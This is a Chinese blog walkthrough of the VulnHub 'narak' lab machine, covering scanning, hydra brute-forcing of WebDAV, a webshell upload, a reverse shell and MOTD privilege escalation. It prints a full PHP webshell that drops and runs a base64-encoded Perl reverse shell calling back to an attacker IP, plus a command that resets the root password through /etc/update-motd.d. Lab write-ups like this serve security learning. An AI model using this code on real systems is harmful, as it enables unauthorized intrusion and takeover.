vulnhub靶场-narak

已于 2023-10-23 15:28:41 修改
阅读量116 收藏 1
点赞数 1
文章标签: linux 运维 服务器 网络安全
于 2023-09-21 13:25:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68865419/article/details/133131878
版权

1.查找本机ip

输入ifconfig

2.寻找靶机

kali网段:192.168.19.0/24

namp 192.168.19.0/24 知道一个IP 192.168.19.137 端口22 80(每一个电脑靶机IP不一样)

3.在浏览器输入靶机IP,发现是图片

查看页面源代码看是否有有价值的信息

4.如果源代码没有重要信息,扫描整个网络。

发现上传协议webdav,Webdav一种文件传输协议

5.cewl爬行网站创建密码字典

渗透该协议,发现需要密码

6.暴力破解密码

hydra是一个自动化的爆破工具,暴力破解密码,是一个被迫神器。

语法:Hydra 参数 IP 服务
-l login小写,指定用户名进行破解
-L flie 指定用户名破解·1
-p 小写 小写,指定密码破解,少用,一般是采用密码字典
-P 大写,指定密码字典

注:这里的P和L都是大写

7.在网页中打开http://192.168.19.137/webdav/webshell.php

输入刚刚破解出来的密码

并且同时把账号密码输入到刚刚的命令中。

8.下载webshell

<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.145.128";
$yourport = '4444';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>

这里给大家安利好了,但要注意把里面的ip改成自己本机的IP。

然后使用put命令进入

9.打开监视

nc -lvvp 4444 这个过程稍微有一点久,但大家的电脑应该会很快,我的比较老了

反弹shell,执行下面命令进入python交互式

python3 -c 'import pty;pty.spawn("/bin/bash")'

10.BF解码

当我们进入cat hell.sh会发现有一个弥明之众暗示的特殊符号

--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.

在虚拟机中打开浏览器输入网址

http://www.splitbrain.org/services/ook

密码为:chitragupt

先尝试第一个账号referno

发现第一个flag

12.mot提权获得第二个flag

Motd提权
修改文件 、etc/update-motd.d/00-hradcr
1.	进入到文件夹; /etc/update-motd.d/
2.	修改文件: echo 'echo "root:admin" | sudo chpasswd' >> 00-header
3.	重新登陆
4.	su root

找到第二个flag,圆满完成!!!

向前进.
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
BF暴力破解法
qq_43323094的博客
06-18 388
#include<stdio.h> #include<string.h> #define MAXSIZE 255 typedef struct//定于串的结构体类型 { char string[MAXSIZE+1]; int length; }SString; SString S,T; int indexBF(SString S,SString T) { int i=1; int j=1; while(i<=S.length&&j<=T.len
brainfuck解码工具
forward2004的博客
10-24 1947
解码工具
在线编码转换/在线各类编码转换工具
weixin_45996552的博客
01-07 3258
在线编码转换 链接: 在线编码转换. 链接: 在线编码转换工具. 在线 \u5728\u7ebf 离线 \u79bb\u7ebf
BUUCTF Misc 神秘龙卷风
Leslie_LIL的博客
02-28 706
题目如下: 题目提示压缩包密码是4位数字,用ARCHPR破解密码 得到如下的字符串 查找资料发现是Brainfuck,在线解码即可得到flag 在线解码http://bf.doleczek.pl/
bftools(加密解密工具)
10-16
ctf中出现的图片隐写所用到的工具。从网上搜集来的,安全自测。
简单的brainfuck解码工具
06-15
简单的brainfuck解码工具,将brainfuck编码输入即可获得明文。
靶机练习 narak ,个人学习心得
09-08
靶机练习 NARAK,个人学习心得 靶机练习 靶机练习是渗透测试的重要组成部分,它可以帮助我们检测系统中的安全漏洞和脆弱性。在这个练习中,我们使用的靶机是 NARAK,并且通过渗透测试来获取 Flag。 探测靶机 IP ...
Goruntu-Isleme
02-21
Bu komşuların sınıfları sayısının toplamı alınarak, en sık görülen sınıf o noktanın sınıflandırması olarak seçilir. **Jupyter Notebook Kullanımı** Jupyter Notebook, bilimsel ...
Google搜索引擎算法的秘密
05-18
在IT行业中,搜索引擎优化(SEO)是至关重要的领域,尤其是对于Google搜索引擎,它的算法秘密一直是业界探讨的焦点。Google作为全球最广泛使用的搜索引擎,其强大的搜索能力得益于不断更新和优化的算法。...
在线解密解码工具
热门推荐
eWFuZw==的博客
05-09 3万+
ASCII网页转换工具 MD5 MD5在线解密1 md5在线解密2 站长工具 Unicode编码转换-站长工具 DES加解密-站长工具 base64加解密-站长工具 base64转图片-站长工具 文本在线加解密 栅栏在线加解密 凯撒在线加解密1 凯撒在线加解密2 Fair-Play在线加解密 rabbit在线加解密 DES在线加解密 维吉尼亚在线加解密1 维吉利亚在线加解密2 Brainfuck和...
BF系列语言
nameofcsdn的博客
12-06 3816
本文总结一下,BF系列语言的指令、指针宽度、编码模型 1,Brainfuck https://blog.csdn.net/nameofcsdn/article/details/110231730 指令: 字符 含义 > 指针加一 < 指针减一 + 指针指向的字节的值加一 - 指针指向的字.
5G NR QC-LDPC的译码方法(BF算法)(三)
daijingxin的博客
03-29 4313
目录硬判决位翻转译码软判决位翻转译码软硬判决翻转译码算法的性能对比 对于线性分组码,译码的复杂度随码长呈指数增加,传统的基于最大似然译码(MLD)准则的译码算法对于LDPC码这样的长码来说,是很困难的、或者说是不现实的。LDPC码的译码算法通常称之为置信传播算法(Belief Propagatiol Algorithm),这是一种选代的概率译码方法,是LDPC码特征之一,也是其性能优越的原因之一。 硬判决位翻转译码 先介绍一种简单的LDPC码译码算法,由Gallager 在其论文中提出的被命名为 Galla
BF算法
汉南最後の読書人
04-21 6626
算法思想解析:    BF(Brute Force)算法也就是传说中的“笨办法”,是一个暴力/蛮力算法。设串S和P的长度分别为m,n,则它在最坏情况下的时间复杂度是O(m*n)。BF算法的最坏时间复杂度虽然不好,但它易于理解和编程,在实际应用中,一般还能达到近似于O(m+n)的时间度(最坏情况不是那么容易出现的,RP问题),因此,还在被大量使用。   代码实现: #incl
Linux 定时任务
flash的博客
08-14 277
Linux系统中,cron是一个广泛使用的定时任务工具,允许用户安排周期性执行的任务(脚本或命令)。cron守护进程(crond)会读取配置文件(通常位于/etc/crontab),并根据这些配置文件中指定的时间规则来执行相应的任务。
linux:有关目录、链接文件的函数 Makefil、gdb的使用
最新发布
T66656的博客
08-15 615
功能:根据用户id到/etc/passwd文件下解析获得结构体信息参数:uid:用户id返回值:成功返回id对应用户的信息失败返回NULLpasswd结构体的定义通常如下所示。
linux开启RNDIS,实现虚拟网卡
轩辕霸天L
08-15 265
首先要 `make clean`,清空之前的编译结果。
linux为QT程序创建桌面应用
王尼莫的博客
08-12 206
【代码】linux为QT程序创建桌面应用。
linux进程
lijiaweixx的博客
08-12 391
设计程序动态生成两个进程分别向相同文件写入不同数据时,需注意父子进程操作同一文件,可通过。Linux 中的 PCB(process control block)进程的主要作用是实现并发,提高系统资源的利用率和系统的处理能力。内核的主要功能之一是完成进程调度,宏观上并行,微观上串行。创建进程,在不同的进程分支中通过。获取进程 ID 及时间来标识。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

向前进.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值